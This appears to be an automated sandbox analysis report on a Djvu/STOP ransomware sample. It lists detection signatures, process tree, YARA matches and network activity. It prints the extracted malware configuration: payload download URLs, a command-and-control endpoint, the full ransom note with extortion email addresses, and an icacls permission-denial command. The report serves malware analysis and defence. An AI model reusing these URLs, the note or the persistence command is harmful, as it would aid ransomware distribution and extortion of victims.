Windows Analysis Report NZPC0PFaC0.exe

Overview

General Information

Sample Name: NZPC0PFaC0.exe
Analysis ID: 496234
MD5: 550b59b69ebfd6dda6b55725245b46ad
SHA1: f6a71793288cc09397b262fba8fc38b29073a44e
SHA256: 0d977e55742460c71884d6040178fc8c7abf8c97136b6293da37cbf9c59b6778
Tags: exe, Ransomware, Stop
Most interesting Screenshot: (screenshot image not reproduced in this text capture)

Detection

Djvu
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Found ransom note / readme
Yara detected Djvu Ransomware
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign process
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • NZPC0PFaC0.exe (PID: 4332 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 752 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' MD5: 550B59B69EBFD6DDA6B55725245B46AD)
      • icacls.exe (PID: 6824 cmdline: icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
      • NZPC0PFaC0.exe (PID: 5344 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask MD5: 550B59B69EBFD6DDA6B55725245B46AD)
        • NZPC0PFaC0.exe (PID: 7112 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • NZPC0PFaC0.exe (PID: 1376 cmdline: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 5608 cmdline: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • NZPC0PFaC0.exe (PID: 4340 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 6880 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • NZPC0PFaC0.exe (PID: 1308 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 7044 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • cleanup

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://znpst.top/dl/build2.exe", "http://securebiz.org/files/1/build3.exe"], "C2 url": "http://securebiz.org/fhsgtsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-1JwFK5rT39\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nmanager@mailtemp.ch\r\n\r\nReserve e-mail address to contact us:\r\nsupporthelp@airmail.cc\r\n\r\nYour personal ID:\r\n0336gSd743d", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", 
"C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu57tFlgbtLAHOxlEyo7a\\\\n5EQX5BVCj\\/a01eBfOlLp1C\\/dUPKprRIvTRRYnjtkCN5uB0ni9m\\/GGY2R7dcZkBFE\\\\nFoYdHolqx1DzonNoGRf9FH126K9Djn\\/HJE1luOEKVS57yPCWDL4Nf2c1TVGhDLl7\\\\n2NmDGdmBBTlc92jSlZKpsKqIk++xsdGv6W05uMaqMEaSbW4oorrufOnex8zyxXIA\\\\nFltacJCoc2A2tbl7Ur\\/N2sp7ppeafCe9YT\\/TIYPosfgVT3FuFUQVimLFoxytPeOv\\\\nozAeLpTyyumQUfg0WY2cC+tum+9X\\/S+\\/2ED2iaR55NnI3yeLV5ACb5mqVIBsNUlq\\\\nkQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
(30 entries in total; only the first are shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
12.2.NZPC0PFaC0.exe.400000.0.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
12.2.NZPC0PFaC0.exe.400000.0.raw.unpack | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xe0dea:$s1: http://
  • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe0dea:$f1: http://
8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpack | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security
13.2.NZPC0PFaC0.exe.400000.0.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
(55 entries in total; only the first are shown here)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 10.2.NZPC0PFaC0.exe.400000.0.unpack | Malware Configuration Extractor: Djvu (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: NZPC0PFaC0.exe | Virustotal: Detection: 35%
Source: NZPC0PFaC0.exe | ReversingLabs: Detection: 55%
Multi AV Scanner detection for domain / URL
Source: securebiz.org | Virustotal: Detection: 17%
Source: http://securebiz.org/fhsgtsspen6/get.php | Virustotal: Detection: 19%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | ReversingLabs: Detection: 55%
Machine Learning detection for sample
Source: NZPC0PFaC0.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040E870
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040EAA0
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,5_2_00410FC0
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,10_2_0040E870
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_0040EA51 CryptDestroyHash,CryptReleaseContext,10_2_0040EA51
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,10_2_0040EAA0
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_0040EC68 CryptDestroyHash,CryptReleaseContext,10_2_0040EC68
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,10_2_00410FC0
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_00411178 CryptDestroyHash,CryptReleaseContext,10_2_00411178
Source: NZPC0PFaC0.exe, 00000010.00000002.555399079.00000000031BA000.00000004.00000010.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Unpacked PE file: 5.2.NZPC0PFaC0.exe.400000.0.unpack
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Unpacked PE file: 10.2.NZPC0PFaC0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 12.2.NZPC0PFaC0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 13.2.NZPC0PFaC0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 16.2.NZPC0PFaC0.exe.400000.0.unpack
Source: NZPC0PFaC0.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | File created: C:\Users\user\_readme.txt
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb | source: NZPC0PFaC0.exe, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\lif-ved49-podacarofo-judisovuhola10.pdb | source: NZPC0PFaC0.exe
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI | source: NZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
Source: Binary string: cC:\lif-ved49-podacarofo-judisovuhola10.pdb | source: NZPC0PFaC0.exe
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_00410160
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_0040F730
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_1_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_1_00410160
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,10_2_00410160

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://securebiz.org/fhsgtsspen6/get.php
Source: Joe Sandbox View | ASN Name: SKB-ASSKBroadbandCoLtdKR
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 77.123.139.190
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: NZPC0PFaC0.exe, 00000010.00000003.376779367.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: NZPC0PFaC0.exe, 00000010.00000003.377098240.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: NZPC0PFaC0.exe, 00000010.00000003.377220530.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: NZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: NZPC0PFaC0.exe, 00000010.00000003.376736269.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.amazon.com/
Source: NZPC0PFaC0.exe, 00000010.00000003.376800469.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.google.com/
Source: NZPC0PFaC0.exe, 00000010.00000003.376822071.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.live.com/
Source: NZPC0PFaC0.exe, 00000010.00000003.376954535.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.nytimes.com/
Source: NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: http://www.openssl.org/support/faq.html
Source: NZPC0PFaC0.exe, 00000010.00000003.377028462.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.reddit.com/
Source: NZPC0PFaC0.exe, 00000010.00000003.377098240.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.twitter.com/
Source: NZPC0PFaC0.exe, 00000010.00000003.377181082.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.wikipedia.com/
Source: NZPC0PFaC0.exe, 00000010.00000003.377220530.0000000003500000.00000004.00000010.sdmp | String found in binary or memory: http://www.youtube.com/
Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | String found in binary or memory: https://api.2ip.ua/
Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | String found in binary or memory: https://api.2ip.ua//Wjn
Source: NZPC0PFaC0.exe, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000003.365995689.00000000007A2000.00000004.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: https://api.2ip.ua/geo.json
Source: NZPC0PFaC0.exe, 0000000A.00000002.332958697.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: https://api.2ip.ua/geo.jsonC
Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | String found in binary or memory: https://api.2ip.ua/geo.jsonS
Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | String found in binary or memory: https://api.2ip.ua/geo.jsont
Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | String found in binary or memory: https://api.2ip.ua/geo.jsonyZ3
Source: NZPC0PFaC0.exe, 00000010.00000002.554664227.000000000078F000.00000004.00000020.sdmp | String found in binary or memory: https://we.tl/t-1JwFK5rT
Source: NZPC0PFaC0.exe, 00000010.00000002.554723819.00000000007A9000.00000004.00000020.sdmp, _readme.txt0.16.dr | String found in binary or memory: https://we.tl/t-1JwFK5rT39
Source: unknown | DNS traffic detected: queries for: api.2ip.ua
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_0040CF10
Source: global traffic | HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic | HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic | HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic | HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic | HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
